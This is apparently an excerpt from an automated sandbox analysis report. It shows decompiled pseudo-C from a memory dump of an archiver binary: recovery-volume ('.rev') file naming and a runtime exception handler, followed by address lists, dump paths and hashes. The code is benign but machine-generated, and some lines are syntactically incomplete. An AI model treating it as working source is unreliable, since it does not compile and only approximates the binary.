				E00007FF67FF650B31CF0(_t388, _t484 - 0x50);
				r8d = 0x800;
				E00007FF67FF650B5A390(_t484 + 0x8f80, __r8, __r8);
				_t305 = r14d;
				 *(_t487 + 0x60) = r14d;
				if (E00007FF67FF650B3345C() == 0) goto 0x50b4a8fd;
				E00007FF67FF650B69B58(_t365, __r8);
				 *(_t487 + 0x70) = _t365;
				if (_t365 == 0) goto 0x50b4a8a9;
				E00007FF67FF650B31C28(_t365);
				goto 0x50b4a8ac;
				_t390 = _t518;
				E00007FF67FF650B32864();
				_t366 = _t305;
				 *((long long*)(_t512 + _t366 * 8)) = _t390;
				_t306 = _t305 + 1;
				_t245 = _t306;
				if (_t306 - 0xff >= 0) goto 0x50b4aa75;
				r8b = r15b == 0;
				E00007FF67FF650B44E90(0x1040, 0x800, _t366, _t390, __r8, __r8, _t484);
				if (E00007FF67FF650B3345C() != 0) goto 0x50b4a888;
				 *(_t487 + 0x60) = _t245;
				if (_t245 == 1) goto 0x50b4af4a;
				_t246 =  *(_t504 + 0x7150);
				 *(_t487 + 0x54) = _t246;
				if (_t246 >= 0) goto 0x50b4a936;
				_t251 = (r14d & 0xffffff00 |  ~(_t246 * _t306) != ((0x51eb851f *  ~(_t246 * _t306) >> 0x00000020 >> 0x00000005) + (0x51eb851f *  ~(_t246 * _t306) >> 0x00000020 >> 0x00000005 >> 0x0000001f)) * 0x00000064) + (0x51eb851f *  ~(_t246 * _t306) >> 0x20 >> 5) + (0x51eb851f *  ~(_t246 * _t306) >> 0x20 >> 5 >> 0x1f);
				 *(_t487 + 0x54) = _t251;
				if (_t251 - _t306 < 0) goto 0x50b4a941;
				_t30 = _t468 - 1; // -1
				 *(_t487 + 0x54) = _t30;
				if (_t390 + _t468 - 0xff <= 0) goto 0x50b4a969;
				r8d = 0xff;
				E00007FF67FF650B23C90(0x31, _t472);
				 *(_t487 + 0x54) = 0xff;
				 *(_t484 - 0x80) = _t366;
				_t367 = _t306;
				 *(_t484 - 0x78) = _t367 * 8 + _t512;
				_t369 = _t367 * _t366 +  *((intOrPtr*)(_t512 + 0x800));
				 *((long long*)(_t484 - 0x70)) = _t369;
				E00007FF67FF650B44330(_t369, _t484 + 0x8f80);
				if (_t369 == 0) goto 0x50b4aa05;
				if (r15b == 0) goto 0x50b4aa02;
				E00007FF67FF650B44590(_t390, _t468, _t369, _t484, _t511, _t503);
				_t474 = _t369;
				r14d = 1;
				if (_t474 - _t484 + 0x8f80 <= 0) goto 0x50b4aa00;
				_t47 = _t474 - 2; // -1
				_t526 = _t47;
				if (E00007FF67FF650B59F44(_t484 + 0x8f80) == 0) goto 0x50b4aa00;
				_t475 = _t526;
				r14d = r14d + 1;
				_t371 = _t484 + 0x8f80;
				if (_t526 - _t371 > 0) goto 0x50b4a9dd;
				 *_t475 = 0;
				E00007FF67FF650B320B8(_t390,  *_t512, _t475, _t468);
				 *(_t484 - 0x68) = _t371;
				if (r14d != 0) goto 0x50b4aa25;
				r14d = E00007FF67FF650B59DAC(_t306);
				if (0xff <= 0) goto 0x50b4ab9e;
				r12d = 0xff;
				 *((short*)(_t484 + 0x9f80)) = 0;
				_t500 = _t484 + 0x8f80;
				if ( *((intOrPtr*)(_t487 + 0x50)) == 0) goto 0x50b4aa8a;
				 *(_t487 + 0x28) = 1;
				 *(_t487 + 0x20) = r14d;
				_t192 = E00007FF67FF650B1657C(_t306, _t371, _t484 + 0x9f80, _t367 * 8 + _t512, L"%ls%0*d.rev", _t484 + 0x8f80, _t471);
				goto 0x50b4aab1;
				r8d = _t192;
				E00007FF67FF650B23C90(0x31, _t475);
				goto 0x50b4af4a;
				 *(_t487 + 0x48) = 1;
				 *(_t487 + 0x40) = r14d;
				 *((intOrPtr*)(_t487 + 0x38)) = 0xff - _t306;
				 *(_t487 + 0x30) = r14d;
				 *(_t487 + 0x28) = _t306;
				 *(_t487 + 0x20) = r14d;
				E00007FF67FF650B1657C(0x31, _t371, _t484 + 0x9f80, _t475, L"%ls%0*d_%0*d_%0*d.rev", _t484 + 0x8f80, _t483);
				E00007FF67FF650B69B58(_t371, _t484 + 0x9f80);
				 *(_t487 + 0x70) = _t371;
				if (_t371 == 0) goto 0x50b4aad3;
				_t411 = _t371;
				E00007FF67FF650B31C28(_t411);
				goto 0x50b4aad6;
				_t372 = _t411;
				 *( *(_t484 - 0x78)) = _t372;
				 *((char*)(_t487 + 0x38)) = 0;
				 *(_t487 + 0x30) = _t411;
				 *(_t487 + 0x28) = 0x7fffffff;
				 *(_t487 + 0x20) = _t487 + 0x51;
				r9d = 0x800;
				if (E00007FF67FF650B317E8(_t390,  *((intOrPtr*)(_t487 + 0x68)), _t372, _t468, _t475, _t484, _t484 + 0x9f80, _t484 + 0x8f80) != 0) goto 0x50b4ab51;
				_t339 =  *((intOrPtr*)(_t487 + 0x51));
				if (_t339 != 0) goto 0x50b4ab38;
				E00007FF67FF650B2C8F8(_t339, 0x50ba7ab8);
				asm("sbb edx, edx");
				E00007FF67FF650B2C930(9, _t339, _t390, 0x50ba7ab8, _t372, _t484 + 0x9f80, _t484 + 0x8f80);
				E00007FF67FF650B32388( *( *(_t484 - 0x78)));
				E00007FF67FF650B111C0(0x76, _t484 + 0x9f80);
				E00007FF67FF650B111C0(0x97, _t484 + 0x9f80);
				if (_t339 != 0) goto 0x50b4aa3e;
				 *(_t484 - 0x58) = _t372;
				_t476 = _t475 | 0xffffffff;
				 *(_t484 - 0x60) = _t476;
				E00007FF67FF650B283F0(L"     ", _t484 + 0x9f80, _t484 + 0x9f80, _t484 + 0x8f80);
				r12d =  *( *((intOrPtr*)(_t487 + 0x68)) + 0x9518);
				 *(_t487 + 0x58) = r12d;
				r14d = r12d;
				_t373 =  <  ? _t476 : _t372;
				E00007FF67FF650B69B9C(_t484 + 0x9f80, _t484 + 0x8f80);
				 *(_t487 + 0x70) =  <  ? _t476 : _t372;
				_t340 = r12d;
				if (_t340 == 0) goto 0x50b4ac01;
				E00007FF67FF650B55D38(0xff - _t306, 2, _t314,  <  ? _t476 : _t372, _t484 + 0x9f80, _t468, _t373);
				if (_t340 != 0) goto 0x50b4abea;
				r15d = 0;
				_t310 = r15d;
				if (_t306 <= 0) goto 0x50b4ac93;
				r14d = 0;
				r13d = _t306;
				_t469 =  *(_t484 - 0x80);
				E00007FF67FF650B5B008();
				_t460 =  *((intOrPtr*)( *((intOrPtr*)(_t487 + 0x78)) + 0x800)) + _t518 - 1;
				_t213 =  *0x50b80550();
				if (0 == _t469) goto 0x50b4ac6a;
				E00007FF67FF650B6C1A0(_t213, 0,  *((intOrPtr*)( *((intOrPtr*)(_t487 + 0x78)) + 0x800)) + _t518 - 1, _t460, _t469);
				_t311 =  >  ? r12d : _t310;
				if (r12d != _t310) goto 0x50b4ac23;
				_t255 =  *(_t487 + 0x54);
				_t307 =  *(_t487 + 0x60);
				_t516 =  *((intOrPtr*)(_t487 + 0x78));
				r12d =  *(_t487 + 0x58);
				r15d = 0;
				if (_t311 == 0) goto 0x50b4adf0;
				r14d = _t311 / r12d;
				r14d =  <  ? _t311 : r14d;
				r12d = 0;
				if (_t311 <= 0) goto 0x50b4ad5b;
				 *(_t487 + 0x5c) = _t460 - 1;
				_t220 =  !=  ? r14d : _t311 - r15d;
				r14d =  !=  ? r14d : _t311 - r15d;
				_t426 = 0 +  *(_t487 + 0x70);
				 *((long long*)(_t426 + 0x2c10)) =  *((intOrPtr*)(_t516 + 0x800));
				 *((long long*)(_t426 + 0x2c18)) =  *((intOrPtr*)(_t484 - 0x70));
				 *(_t426 + 0x2c20) = r15d;
				r15d = r15d + r14d;
				 *(_t426 + 0x2c24) = r15d;
				 *(_t426 + 0x2c28) = _t307;
				 *(_t426 + 0x2c2c) = _t255;
				 *((long long*)(_t426 + 0x2c30)) =  *(_t484 - 0x80);
				if ( *(_t487 + 0x58) - 1 <= 0) goto 0x50b4ad42;
				E00007FF67FF650B5B224( *(_t484 - 0x80),  *((intOrPtr*)(_t487 + 0x78)),  *((intOrPtr*)(_t516 + 0x828)), 0x50b4b830, _t373 + 0x2c48, _t426);
				goto 0x50b4ad47;
				E00007FF67FF650B4A65C(_t307,  *((intOrPtr*)(_t487 + 0x78)),  *((intOrPtr*)(_t516 + 0x828)), _t373 + 0x2c48);
				r12d = r12d + 1;
				if (r15d - _t311 < 0) goto 0x50b4acc6;
				E00007FF67FF650B5B518( *((intOrPtr*)(_t516 + 0x828)));
				_t508 = _t311;
				_t350 = _t255;
				if (_t350 <= 0) goto 0x50b4ada1;
				r15d = _t255;
				_t392 =  *(_t484 - 0x80);
				E00007FF67FF650B5B008();
				E00007FF67FF650B329C4(_t255,  *(_t487 + 0x58), _t313,  *(_t484 - 0x80), _t392,  *( *(_t484 - 0x78)),  *((intOrPtr*)(_t484 - 0x70)), _t508);
				if (_t350 != 0) goto 0x50b4ad7d;
				_t523 =  *(_t484 - 0x68);
				_t533 =  *(_t484 - 0x58);
				_t312 = E00007FF67FF650B59AD8(_t533,  *(_t484 - 0x68));
				if ( *((intOrPtr*)( *((intOrPtr*)(_t487 + 0x68)) + 0x7154)) != 0) goto 0x50b4addf;
				if (_t312 ==  *(_t484 - 0x60)) goto 0x50b4addf;
				E00007FF67FF650B5CE78(_t307, _t312 -  *(_t484 - 0x60),  *((intOrPtr*)(_t487 + 0x68)), _t392, _t533, _t469,  &(( *(_t484 - 0x78))[2]),  *(_t484 - 0x68), _t484 + 0x8f80);
				 *(_t484 - 0x60) = _t312;
				 *(_t484 - 0x58) = _t533 + _t508;
				r12d =  *(_t487 + 0x58);
				goto 0x50b4ac01;
				0x50b69b94();
				_t509 =  *((intOrPtr*)(_t487 + 0x68));
				if ( *((intOrPtr*)(_t509 + 0x7154)) != r15b) goto 0x50b4ae1d;
				r8d = 0x64;
				E00007FF67FF650B5CE78(_t307,  *((intOrPtr*)(_t509 + 0x7154)) - r15b,  *((intOrPtr*)(_t487 + 0x68)), _t392, _t533, _t469,  &(( *(_t484 - 0x78))[2]), _t523, _t500);
				if ( *((intOrPtr*)(_t487 + 0x50)) == 0) goto 0x50b4ae33;
				E00007FF67FF650B164E4(0x78);
				r14d = r15d;
				if (_t392 + _t469 <= 0) goto 0x50b4af2d;
				_t481 =  *((intOrPtr*)(_t516 + r14d * 8));
				if ( *((intOrPtr*)(_t487 + 0x50)) == 0) goto 0x50b4af07;
				if (r14d - _t307 < 0) goto 0x50b4af07;
				_t383 =  *((intOrPtr*)( *_t481 + 0x28));
				 *0x50b80550();
				_t535 = _t383;
				if (_t383 - 4 < 0) goto 0x50b4af2a;
				r8d = 0;
				 *0x50b80550();
				_t143 = _t469 - 1; // -1
				E00007FF67FF650B323C4(_t143);
				_t144 = _t392 - 1; // -1
				E00007FF67FF650B323C4(_t144);
				E00007FF67FF650B323C4(r14b - dil);
				_t145 = _t481 + 0x3a; // 0x3a
				E00007FF67FF650B111C0(0x66, _t145);
				_t146 = _t535 - 4; // -4
				r15d = 0;
				 *(_t487 + 0x28) = r15d;
				 *(_t487 + 0x20) = _t146;
				r9d =  *(_t509 + 0x9518);
				r8d = 0;
				E00007FF67FF650B32BDC(r14b - dil, _t481, _t487 + 0x5c, _t481, _t523);
				E00007FF67FF650B323C4( *(_t487 + 0x5c) >> r15d);
				r15d = r15d + 8;
				if (r15d - 0x20 < 0) goto 0x50b4aee9;
				r15d = 0;
				 *0x50b80550();
				r14d = r14d + 1;
				if (r14d - _t392 + _t469 < 0) goto 0x50b4ae41;
				r15d = 0;
				if ( *((intOrPtr*)(_t509 + 0x7156)) != r15b) goto 0x50b4af4a;
				E00007FF67FF650B54598(0xd28, _t307, _t392, _t481, _t484, _t523);
				E00007FF67FF650B283F0( *((intOrPtr*)( *_t481 + 0x10)), _t487 + 0x5c, _t523, _t500);
				return E00007FF67FF650B69D10(E00007FF67FF650B175D4(_t392, _t484 - 0x50), 0xd28,  *(_t484 + 0xaf80) ^ _t487);
			}
































































                                                                                                            0x7ff650b4a7c0
                                                                                                            0x7ff650b4a7c0
                                                                                                            0x7ff650b4a7c0
                                                                                                            0x7ff650b4a7c0
                                                                                                            0x7ff650b4a7d0
                                                                                                            0x7ff650b4a7dd
                                                                                                            0x7ff650b4a7e2
                                                                                                            0x7ff650b4a7e5
                                                                                                            0x7ff650b4a7ec
                                                                                                            0x7ff650b4a7ef
                                                                                                            0x7ff650b4a7f6
                                                                                                            0x7ff650b4a7f9
                                                                                                            0x7ff650b4a7fc
                                                                                                            0x7ff650b4a801
                                                                                                            0x7ff650b4a804
                                                                                                            0x7ff650b4a80d
                                                                                                            0x7ff650b4a81a
                                                                                                            0x7ff650b4a81f
                                                                                                            0x7ff650b4a824
                                                                                                            0x7ff650b4a82a
                                                                                                            0x7ff650b4a831
                                                                                                            0x7ff650b4a839
                                                                                                            0x7ff650b4a841
                                                                                                            0x7ff650b4a84a
                                                                                                            0x7ff650b4a84f
                                                                                                            0x7ff650b4a851
                                                                                                            0x7ff650b4a85a
                                                                                                            0x7ff650b4a85f
                                                                                                            0x7ff650b4a86f
                                                                                                            0x7ff650b4a874
                                                                                                            0x7ff650b4a877
                                                                                                            0x7ff650b4a886
                                                                                                            0x7ff650b4a88d
                                                                                                            0x7ff650b4a892
                                                                                                            0x7ff650b4a89a
                                                                                                            0x7ff650b4a89f
                                                                                                            0x7ff650b4a8a7
                                                                                                            0x7ff650b4a8a9
                                                                                                            0x7ff650b4a8b2
                                                                                                            0x7ff650b4a8b7
                                                                                                            0x7ff650b4a8ba
                                                                                                            0x7ff650b4a8bf
                                                                                                            0x7ff650b4a8c1
                                                                                                            0x7ff650b4a8ca
                                                                                                            0x7ff650b4a8d3
                                                                                                            0x7ff650b4a8df
                                                                                                            0x7ff650b4a8ee
                                                                                                            0x7ff650b4a8f0
                                                                                                            0x7ff650b4a8f7
                                                                                                            0x7ff650b4a8fd
                                                                                                            0x7ff650b4a905
                                                                                                            0x7ff650b4a90b
                                                                                                            0x7ff650b4a930
                                                                                                            0x7ff650b4a932
                                                                                                            0x7ff650b4a938
                                                                                                            0x7ff650b4a93a
                                                                                                            0x7ff650b4a93d
                                                                                                            0x7ff650b4a949
                                                                                                            0x7ff650b4a94b
                                                                                                            0x7ff650b4a959
                                                                                                            0x7ff650b4a965
                                                                                                            0x7ff650b4a97c
                                                                                                            0x7ff650b4a980
                                                                                                            0x7ff650b4a98e
                                                                                                            0x7ff650b4a996
                                                                                                            0x7ff650b4a99d
                                                                                                            0x7ff650b4a9a8
                                                                                                            0x7ff650b4a9b5
                                                                                                            0x7ff650b4a9ba
                                                                                                            0x7ff650b4a9c3
                                                                                                            0x7ff650b4a9c8
                                                                                                            0x7ff650b4a9cb
                                                                                                            0x7ff650b4a9db
                                                                                                            0x7ff650b4a9dd
                                                                                                            0x7ff650b4a9dd
                                                                                                            0x7ff650b4a9ec
                                                                                                            0x7ff650b4a9ee
                                                                                                            0x7ff650b4a9f1
                                                                                                            0x7ff650b4a9f4
                                                                                                            0x7ff650b4a9fe
                                                                                                            0x7ff650b4aa02
                                                                                                            0x7ff650b4aa09
                                                                                                            0x7ff650b4aa0e
                                                                                                            0x7ff650b4aa17
                                                                                                            0x7ff650b4aa20
                                                                                                            0x7ff650b4aa27
                                                                                                            0x7ff650b4aa36
                                                                                                            0x7ff650b4aa3e
                                                                                                            0x7ff650b4aa45
                                                                                                            0x7ff650b4aa5c
                                                                                                            0x7ff650b4aa5e
                                                                                                            0x7ff650b4aa62
                                                                                                            0x7ff650b4aa6e
                                                                                                            0x7ff650b4aa73
                                                                                                            0x7ff650b4aa75
                                                                                                            0x7ff650b4aa80
                                                                                                            0x7ff650b4aa85
                                                                                                            0x7ff650b4aa8a
                                                                                                            0x7ff650b4aa8e
                                                                                                            0x7ff650b4aa93
                                                                                                            0x7ff650b4aa97
                                                                                                            0x7ff650b4aa9c
                                                                                                            0x7ff650b4aaa0
                                                                                                            0x7ff650b4aaac
                                                                                                            0x7ff650b4aab6
                                                                                                            0x7ff650b4aabb
                                                                                                            0x7ff650b4aac5
                                                                                                            0x7ff650b4aac7
                                                                                                            0x7ff650b4aaca
                                                                                                            0x7ff650b4aad1
                                                                                                            0x7ff650b4aad3
                                                                                                            0x7ff650b4aad6
                                                                                                            0x7ff650b4aad9
                                                                                                            0x7ff650b4aadd
                                                                                                            0x7ff650b4aaec
                                                                                                            0x7ff650b4aaf6
                                                                                                            0x7ff650b4aafb
                                                                                                            0x7ff650b4ab15
                                                                                                            0x7ff650b4ab1b
                                                                                                            0x7ff650b4ab1d
                                                                                                            0x7ff650b4ab2f
                                                                                                            0x7ff650b4ab3a
                                                                                                            0x7ff650b4ab4c
                                                                                                            0x7ff650b4ab58
                                                                                                            0x7ff650b4ab69
                                                                                                            0x7ff650b4ab7a
                                                                                                            0x7ff650b4ab8e
                                                                                                            0x7ff650b4ab9e
                                                                                                            0x7ff650b4aba2
                                                                                                            0x7ff650b4aba6
                                                                                                            0x7ff650b4abb1
                                                                                                            0x7ff650b4abb6
                                                                                                            0x7ff650b4abbe
                                                                                                            0x7ff650b4abc3
                                                                                                            0x7ff650b4abce
                                                                                                            0x7ff650b4abd5
                                                                                                            0x7ff650b4abdd
                                                                                                            0x7ff650b4abe2
                                                                                                            0x7ff650b4abe5
                                                                                                            0x7ff650b4abef
                                                                                                            0x7ff650b4abff
                                                                                                            0x7ff650b4ac01
                                                                                                            0x7ff650b4ac04
                                                                                                            0x7ff650b4ac09
                                                                                                            0x7ff650b4ac14
                                                                                                            0x7ff650b4ac17
                                                                                                            0x7ff650b4ac1f
                                                                                                            0x7ff650b4ac23
                                                                                                            0x7ff650b4ac2f
                                                                                                            0x7ff650b4ac3f
                                                                                                            0x7ff650b4ac4e
                                                                                                            0x7ff650b4ac65
                                                                                                            0x7ff650b4ac6d
                                                                                                            0x7ff650b4ac7c
                                                                                                            0x7ff650b4ac7e
                                                                                                            0x7ff650b4ac82
                                                                                                            0x7ff650b4ac86
                                                                                                            0x7ff650b4ac8b
                                                                                                            0x7ff650b4ac90
                                                                                                            0x7ff650b4ac95
                                                                                                            0x7ff650b4aca2
                                                                                                            0x7ff650b4acaa
                                                                                                            0x7ff650b4acb0
                                                                                                            0x7ff650b4acb5
                                                                                                            0x7ff650b4acc2
                                                                                                            0x7ff650b4acce
                                                                                                            0x7ff650b4acd2
                                                                                                            0x7ff650b4acdf
                                                                                                            0x7ff650b4aceb
                                                                                                            0x7ff650b4acf6
                                                                                                            0x7ff650b4acfd
                                                                                                            0x7ff650b4ad04
                                                                                                            0x7ff650b4ad07
                                                                                                            0x7ff650b4ad0e
                                                                                                            0x7ff650b4ad14
                                                                                                            0x7ff650b4ad1e
                                                                                                            0x7ff650b4ad28
                                                                                                            0x7ff650b4ad3b
                                                                                                            0x7ff650b4ad40
                                                                                                            0x7ff650b4ad42
                                                                                                            0x7ff650b4ad47
                                                                                                            0x7ff650b4ad55
                                                                                                            0x7ff650b4ad62
                                                                                                            0x7ff650b4ad67
                                                                                                            0x7ff650b4ad6a
                                                                                                            0x7ff650b4ad6c
                                                                                                            0x7ff650b4ad76
                                                                                                            0x7ff650b4ad79
                                                                                                            0x7ff650b4ad7d
                                                                                                            0x7ff650b4ad8b
                                                                                                            0x7ff650b4ad9b
                                                                                                            0x7ff650b4ada1
                                                                                                            0x7ff650b4ada8
                                                                                                            0x7ff650b4adb4
                                                                                                            0x7ff650b4adc3
                                                                                                            0x7ff650b4adc8
                                                                                                            0x7ff650b4add7
                                                                                                            0x7ff650b4addc
                                                                                                            0x7ff650b4ade2
                                                                                                            0x7ff650b4ade6
                                                                                                            0x7ff650b4adeb
                                                                                                            0x7ff650b4adf5
                                                                                                            0x7ff650b4adfa
                                                                                                            0x7ff650b4ae07
                                                                                                            0x7ff650b4ae0e
                                                                                                            0x7ff650b4ae18
                                                                                                            0x7ff650b4ae23
                                                                                                            0x7ff650b4ae2a
                                                                                                            0x7ff650b4ae33
                                                                                                            0x7ff650b4ae3b
                                                                                                            0x7ff650b4ae44
                                                                                                            0x7ff650b4ae4b
                                                                                                            0x7ff650b4ae54
                                                                                                            0x7ff650b4ae60
                                                                                                            0x7ff650b4ae64
                                                                                                            0x7ff650b4ae6a
                                                                                                            0x7ff650b4ae71
                                                                                                            0x7ff650b4ae82
                                                                                                            0x7ff650b4ae88
                                                                                                            0x7ff650b4ae8e
                                                                                                            0x7ff650b4ae94
                                                                                                            0x7ff650b4ae99
                                                                                                            0x7ff650b4ae9f
                                                                                                            0x7ff650b4aead
                                                                                                            0x7ff650b4aeb2
                                                                                                            0x7ff650b4aebb
                                                                                                            0x7ff650b4aec0
                                                                                                            0x7ff650b4aec4
                                                                                                            0x7ff650b4aec7
                                                                                                            0x7ff650b4aecc
                                                                                                            0x7ff650b4aed1
                                                                                                            0x7ff650b4aed9
                                                                                                            0x7ff650b4aee4
                                                                                                            0x7ff650b4aef5
                                                                                                            0x7ff650b4aefa
                                                                                                            0x7ff650b4af02
                                                                                                            0x7ff650b4af04
                                                                                                            0x7ff650b4af11
                                                                                                            0x7ff650b4af17
                                                                                                            0x7ff650b4af24
                                                                                                            0x7ff650b4af2a
                                                                                                            0x7ff650b4af35
                                                                                                            0x7ff650b4af3c
                                                                                                            0x7ff650b4af44
                                                                                                            0x7ff650b4af7c

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: swprintf
                                                                                                            • String ID: $%ls%0*d.rev$%ls%0*d_%0*d_%0*d.rev
                                                                                                            • API String ID: 233258989-1518364771
                                                                                                            • Opcode ID: 0f6eec51381e4252268755ff97f42e88b42bc12c15a9630dcea3a71ce95c0ac1
                                                                                                            • Instruction ID: e64c6890999045778eac8586393dc0e322cb30a38d25cb97fdbed38bca349f3e
                                                                                                            • Opcode Fuzzy Hash: 0f6eec51381e4252268755ff97f42e88b42bc12c15a9630dcea3a71ce95c0ac1
                                                                                                            • Instruction Fuzzy Hash: 6C22E572B08693A6EB10DB65D4C01BD67A5FF86B84F084035DE8EA7B95DE3EE505C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B74A80 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 65%
                                                                                                            			E00007FF67FF650B74A80(void* __ecx, intOrPtr __edx, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* _t36;
				void* _t37;
				void* _t38;
				int _t40;
				signed long long _t62;
				long long _t65;
				_Unknown_base(*)()* _t85;
				void* _t89;
				void* _t90;
				void* _t92;
				signed long long _t93;
				struct _EXCEPTION_POINTERS* _t99;

				 *((long long*)(_t92 + 0x10)) = __rbx;
				 *((long long*)(_t92 + 0x18)) = __rsi;
				_t3 = _t92 - 0x4f0; // -1288
				_t90 = _t3;
				_t93 = _t92 - 0x5f0;
				_t62 =  *0x50b978f0; // 0x27db226282f1
				 *(_t90 + 0x4e0) = _t62 ^ _t93;
				if (__ecx == 0xffffffff) goto 0x50b74abf;
				_t37 = E00007FF67FF650B6AAE8(_t36);
				_t5 = _t93 + 0x70; // 0x58
				r8d = 0x98;
				_t38 = E00007FF67FF650B6C1A0(_t37, 0, _t5, __rdx, __r8);
				_t6 = _t90 + 0x10; // -1272
				r8d = 0x4d0;
				E00007FF67FF650B6C1A0(_t38, 0, _t6, __rdx, __r8);
				_t7 = _t93 + 0x70; // 0x58
				 *((long long*)(_t93 + 0x48)) = _t7;
				_t10 = _t90 + 0x10; // -1272
				_t65 = _t10;
				 *((long long*)(_t93 + 0x50)) = _t65;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t65 == 0) goto 0x50b74b52;
				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
				_t16 = _t93 + 0x60; // 0x48
				 *((long long*)(_t93 + 0x30)) = _t16;
				_t19 = _t93 + 0x58; // 0x40
				 *((long long*)(_t93 + 0x28)) = _t19;
				_t21 = _t90 + 0x10; // -1272
				 *((long long*)(_t93 + 0x20)) = _t21;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
				_t25 = _t90 + 0x508; // 0x0
				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
				 *((long long*)(_t90 + 0xa8)) = _t25 + 8;
				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
				 *((intOrPtr*)(_t93 + 0x74)) = r8d;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t85, _t89);
				if (UnhandledExceptionFilter(_t99) != 0) goto 0x50b74bb4;
				if (_t40 != 0) goto 0x50b74bb4;
				if (__ecx == 0xffffffff) goto 0x50b74bb4;
				return E00007FF67FF650B69D10(E00007FF67FF650B6AAE8(_t42), __ecx,  *(_t90 + 0x4e0) ^ _t93);
			}















                                                                                                            0x7ff650b74a80
                                                                                                            0x7ff650b74a85
                                                                                                            0x7ff650b74a8e
                                                                                                            0x7ff650b74a8e
                                                                                                            0x7ff650b74a96
                                                                                                            0x7ff650b74a9d
                                                                                                            0x7ff650b74aa7
                                                                                                            0x7ff650b74ab8
                                                                                                            0x7ff650b74aba
                                                                                                            0x7ff650b74ac1
                                                                                                            0x7ff650b74ac6
                                                                                                            0x7ff650b74acc
                                                                                                            0x7ff650b74ad3
                                                                                                            0x7ff650b74ad7
                                                                                                            0x7ff650b74add
                                                                                                            0x7ff650b74ae2
                                                                                                            0x7ff650b74ae7
                                                                                                            0x7ff650b74af0
                                                                                                            0x7ff650b74af0
                                                                                                            0x7ff650b74af4
                                                                                                            0x7ff650b74af9
                                                                                                            0x7ff650b74b0e
                                                                                                            0x7ff650b74b11
                                                                                                            0x7ff650b74b1a
                                                                                                            0x7ff650b74b1c
                                                                                                            0x7ff650b74b22
                                                                                                            0x7ff650b74b2f
                                                                                                            0x7ff650b74b37
                                                                                                            0x7ff650b74b3c
                                                                                                            0x7ff650b74b41
                                                                                                            0x7ff650b74b45
                                                                                                            0x7ff650b74b4c
                                                                                                            0x7ff650b74b59
                                                                                                            0x7ff650b74b60
                                                                                                            0x7ff650b74b6b
                                                                                                            0x7ff650b74b6f
                                                                                                            0x7ff650b74b7d
                                                                                                            0x7ff650b74b81
                                                                                                            0x7ff650b74b85
                                                                                                            0x7ff650b74b8f
                                                                                                            0x7ff650b74ba2
                                                                                                            0x7ff650b74ba6
                                                                                                            0x7ff650b74bab
                                                                                                            0x7ff650b74bda

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1239891234-0
